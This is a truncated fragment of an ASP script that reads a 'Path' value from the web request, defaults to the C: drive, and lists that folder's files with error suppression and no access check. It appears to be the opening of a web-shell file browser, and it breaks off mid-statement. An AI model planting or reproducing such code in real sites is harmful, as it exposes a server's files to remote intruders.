% @EnableSessionState = False %> <% Response.Buffer = True On Error Resume Next 'Set some variables CurrentPath = Request("Path") If CurrentPath = "" Then CurrentPath = "C:\" 'Create File Scripting Object Set oFSO = CreateObject("Scripting.FileSystemObject") 'Get current directory Set oFolder = oFSO.GetFolder(CurrentPath) 'Get current files Set oFolderFiles = oFolder.Files 'Subprocedure For error checking Sub ErrorCheck Response.Write "